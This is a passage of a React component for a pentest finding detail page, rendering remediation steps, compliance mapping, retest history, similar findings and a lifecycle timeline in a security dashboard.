                                    className={`flex items-start gap-4 rounded-xl border p-4 transition-all ${step.completed ? "border-green-200/60 bg-green-50/30 dark:border-green-800/30 dark:bg-green-950/10" : "border-zinc-200/60 dark:border-zinc-700/40"}`}
                                >
                                    <div className="mt-0.5">
                                        <Checkbox
                                            checked={step.completed}
                                            onChange={() => toggleRemediationStep(step.id)}
                                            color="blue"
                                        />
                                    </div>
                                    <div className="min-w-0 flex-1">
                                        <div className="flex items-center gap-2">
                                            <span
                                                className={`text-sm font-medium ${step.completed ? "text-zinc-400 line-through" : "text-zinc-900 dark:text-white"}`}
                                            >
                                                {step.title}
                                            </span>
                                            <Badge color={severityColor[step.priority]}>{step.priority}</Badge>
                                        </div>
                                        <p className="mt-0.5 text-xs text-zinc-500">{step.description}</p>
                                        <div className="mt-2 flex items-center gap-4 text-[10px] text-zinc-400">
                                            <span className="flex items-center gap-1">
                                                <UserCircleIcon className="h-3 w-3" />
                                                {step.assignee}
                                            </span>
                                            <span className="flex items-center gap-1">
                                                <CalendarDaysIcon className="h-3 w-3" />
                                                Due: {step.dueDate}
                                            </span>
                                        </div>
                                    </div>
                                    {step.completed && <CheckCircleIcon className="h-5 w-5 shrink-0 text-green-500" />}
                                </div>
                            ))}
                        </div>
                    </Card>

                    {/* Compliance mapping */}
                    {compliance.length > 0 && (
                        <Card>
                            <h3 className="mb-4 text-sm font-semibold text-zinc-900 dark:text-white">
                                Compliance Mapping
                            </h3>
                            <div className="grid gap-3 sm:grid-cols-2">
                                {compliance.map((c) => (
                                    <div
                                        key={c.standard + c.control}
                                        className="flex items-center gap-3 rounded-lg border border-zinc-200/60 p-3 dark:border-zinc-700/40"
                                    >
                                        <Badge color={c.color}>{c.standard}</Badge>
                                        <div>
                                            <p className="text-sm font-medium text-zinc-900 dark:text-white">
                                                Control {c.control}
                                            </p>
                                            <p className="text-[10px] text-zinc-400">
                                                Non-compliant due to this finding
                                            </p>
                                        </div>
                                    </div>
                                ))}
                            </div>
                        </Card>
                    )}
                </div>
            )}

            {/* ============================================================ */}
            {/* HISTORY TAB                                                  */}
            {/* ============================================================ */}
            {activeTab === "history" && (
                <div className="mt-6 space-y-6">
                    {/* Retest history */}
                    <Card>
                        <div className="flex items-center gap-2">
                            <ArrowPathIcon className="h-5 w-5 text-blue-500" />
                            <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                Retest History ({retests.length})
                            </h3>
                        </div>
                        {retests.length > 0 ? (
                            <Table dense className="mt-4">
                                <TableHead>
                                    <TableRow>
                                        <TableHeader>Date</TableHeader>
                                        <TableHeader>Tester</TableHeader>
                                        <TableHeader>Result</TableHeader>
                                        <TableHeader>Version</TableHeader>
                                        <TableHeader>Notes</TableHeader>
                                    </TableRow>
                                </TableHead>
                                <TableBody>
                                    {retests.map((rt) => (
                                        <TableRow key={rt.id}>
                                            <TableCell className="font-mono text-xs">{rt.date}</TableCell>
                                            <TableCell className="text-xs">{rt.tester}</TableCell>
                                            <TableCell>
                                                <Badge
                                                    color={
                                                        rt.result === "pass"
                                                            ? "green"
                                                            : rt.result === "fail"
                                                              ? "red"
                                                              : "yellow"
                                                    }
                                                >
                                                    {rt.result === "pass"
                                                        ? "Pass"
                                                        : rt.result === "fail"
                                                          ? "Fail"
                                                          : "Partial"}
                                                </Badge>
                                            </TableCell>
                                            <TableCell className="font-mono text-xs">{rt.version}</TableCell>
                                            <TableCell className="max-w-xs text-xs text-zinc-500">{rt.notes}</TableCell>
                                        </TableRow>
                                    ))}
                                </TableBody>
                            </Table>
                        ) : (
                            <div className="mt-4 flex flex-col items-center gap-2 py-6">
                                <InformationCircleIcon className="h-6 w-6 text-zinc-300 dark:text-zinc-600" />
                                <p className="text-xs text-zinc-400">No retests recorded yet</p>
                            </div>
                        )}
                    </Card>

                    {/* Similar findings */}
                    <Card>
                        <div className="flex items-center gap-2">
                            <DocumentDuplicateIcon className="h-5 w-5 text-blue-500" />
                            <h3 className="text-sm font-semibold text-zinc-900 dark:text-white">
                                Similar Findings from Other Pentests ({similarFindings.length})
                            </h3>
                        </div>
                        {similarFindings.length > 0 ? (
                            <Table dense className="mt-4">
                                <TableHead>
                                    <TableRow>
                                        <TableHeader>ID</TableHeader>
                                        <TableHeader>Title</TableHeader>
                                        <TableHeader>Pentest</TableHeader>
                                        <TableHeader>Severity</TableHeader>
                                        <TableHeader>Status</TableHeader>
                                        <TableHeader>Date</TableHeader>
                                    </TableRow>
                                </TableHead>
                                <TableBody>
                                    {similarFindings.map((sf) => (
                                        <TableRow key={sf.id}>
                                            <TableCell className="font-mono text-xs font-medium text-blue-600 dark:text-blue-400">
                                                {sf.id}
                                            </TableCell>
                                            <TableCell className="text-sm">{sf.title}</TableCell>
                                            <TableCell className="text-xs text-zinc-500">{sf.pentest}</TableCell>
                                            <TableCell>
                                                <Badge color={severityColor[sf.severity]}>{sf.severity}</Badge>
                                            </TableCell>
                                            <TableCell>
                                                <Badge color={sf.status === "Remediated" ? "green" : "zinc"}>
                                                    {sf.status}
                                                </Badge>
                                            </TableCell>
                                            <TableCell className="font-mono text-xs text-zinc-500">{sf.date}</TableCell>
                                        </TableRow>
                                    ))}
                                </TableBody>
                            </Table>
                        ) : (
                            <div className="mt-4 flex flex-col items-center gap-2 py-6">
                                <InformationCircleIcon className="h-6 w-6 text-zinc-300 dark:text-zinc-600" />
                                <p className="text-xs text-zinc-400">No similar findings found</p>
                            </div>
                        )}
                    </Card>

                    {/* Finding timeline */}
                    <Card>
                        <h3 className="mb-4 text-sm font-semibold text-zinc-900 dark:text-white">Finding Lifecycle</h3>
                        <div className="space-y-0">
                            {[
                                {
                                    time: "2026-02-15",
                                    action: "Finding discovered during Q1 2026 penetration test",
                                    user: "s.braun",
                                    type: "discovery",
                                },
                                {
                                    time: "2026-02-16",
                                    action: "Finding reported and classified",
                                    user: "s.braun",
                                    type: "report",
                                },
                                {
                                    time: "2026-02-18",
                                    action: "Finding assigned for remediation",
                                    user: "m.mustermann",
                                    type: "assign",
                                },
                                ...retests.map((rt) => ({
                                    time: rt.date,
                                    action: `Retest performed: ${rt.result.toUpperCase()} - ${rt.notes}`,
                                    user: rt.tester,
                                    type: rt.result === "pass" ? "pass" : ("fail" as string),
                                })),
                                {
                                    time: "2026-03-13",
                                    action: "Current status: " + status,
                                    user: "System",
                                    type: "status",
                                },
                            ].map((entry, i) => (
                                <div
                                    key={i}
                                    className="relative border-l-2 border-blue-200/60 py-3 pl-5 dark:border-blue-800/60"
                                >
                                    <div
                                        className={`absolute -left-[5px] top-4 h-2.5 w-2.5 rounded-full shadow-sm ${entry.type === "pass" ? "bg-green-400 shadow-green-400/50" : entry.type === "fail" ? "bg-red-400 shadow-red-400/50" : "bg-blue-400 shadow-blue-400/50"}`}
                                    />
                                    <div className="flex items-center gap-2">
                                        <span className="font-mono text-xs text-zinc-400">{entry.time}</span>
                                        <Badge color="zinc">{entry.user}</Badge>
                                    </div>
                                    <p className="mt-1 text-sm text-zinc-700 dark:text-zinc-300">{entry.action}</p>
                                </div>
                            ))}
                        </div>
                    </Card>
                </div>
            )}

            {/* Create ticket button */}
            <div className="mt-6">
                <Button color="blue" onClick={() => onNavigateDetail({ view: "tickets", detailId: undefined })}>
                    <TicketIcon className="h-4 w-4" />
                    {t("pentestDetail.createTicket")}
                </Button>
            </div>
        </>
    );
}
